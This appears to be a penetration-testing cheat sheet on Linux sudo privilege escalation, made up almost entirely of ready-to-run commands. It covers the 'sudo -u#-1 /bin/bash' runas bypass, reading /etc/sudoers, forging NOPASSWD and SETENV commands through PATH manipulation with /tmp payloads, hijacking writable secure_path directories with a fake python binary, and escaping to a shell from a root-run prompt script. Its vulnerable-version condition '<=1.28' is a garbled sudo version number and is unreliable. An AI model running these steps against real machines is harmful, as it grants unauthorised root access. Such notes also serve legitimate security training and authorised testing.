Sudo Privilege Escalation
Last modified: 2023-02-23
Sudo commands might be vulnerable to privilege escalation (PrivEsc).
GTFOBins
GTFOBins provides a wide variety of payloads to privilege escalation.
So it's recommended to look for in there.
Investigation
Version
sudo --version
If the sudo version <=1.28, try the following command.
sudo -u#-1 /bin/bash
As Another Users
sudo su root
sudo -u john whoami
# -s: run shell as target user
sudo -s
Sudo commands (Sudoers)
sudo -l
sudo -ll
# Specify hostname
sudo -h <host-name> -l
# Execute via the hostname
sudo -h <host-name> /bin/bash
Also we might see from following files.
cat /etc/sudoers
cat /etc/sudoers.d/usersgroup
If we find the following result for sudoers,
(ALL, !root) NOPASSWD: /bin/bash
We might be able to get a root shell as follow.
sudo -u#-1 /bin/bash
Command Forgery (NOPASSWD)
If you are allowed to execute some command, you can forge the contents of the command.
First off, check the properties.
sudo -l
(root) NOPASSWD: somecmd
If you can confirm that it can be executed as root without password, create the same named command in the arbitrary folder in which you can write files.
# option 1
echo /bin/sh > /tmp/somecmd
Next, change the permission for allowing to execute it.
And add the path to the environment.
chmod +x /tmp/somecmd
export PATH=/tmp:$PATH
Now execute the command as root.
sudo somecmd
whoami
# root
Command Forgery (SETENV, NOPASSWD)
If you found there is a SETENV: in sudoers, you can set the PATH when running the command.
sudo -l
(root) SETENV: NOPASSWD: somecmd
As the previous section, prepare the payload.
echo '/bin/bash -p' > /tmp/somecmd
chmod +x /tmp/somecmd
Now run the command as root with setting the PATH.
sudo PATH=/tmp:$PATH somecmd
whoami
Command Path Hijacking
sudo -l
env_reset
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
(root) python /home/user/example.py
If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead we need to check if we have permission to write each path.
ls -al /usr/local/
ls -al /usr/
ls -al /
Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there.
For example, we create a python binary under /usr/sbin.
echo /bin/bash > /usr/sbin/python
chmod +x /usr/sbin/python
Then execute the sudo command.
sudo python /home/user/example.py
Now we should get a root shell.
Shell in Prompt
#!/bin/bash
read -p "What's you name: "
If we found there is another user’s script which can be executed as root, you can input `/bin/bash -i` to get a shell as another user.
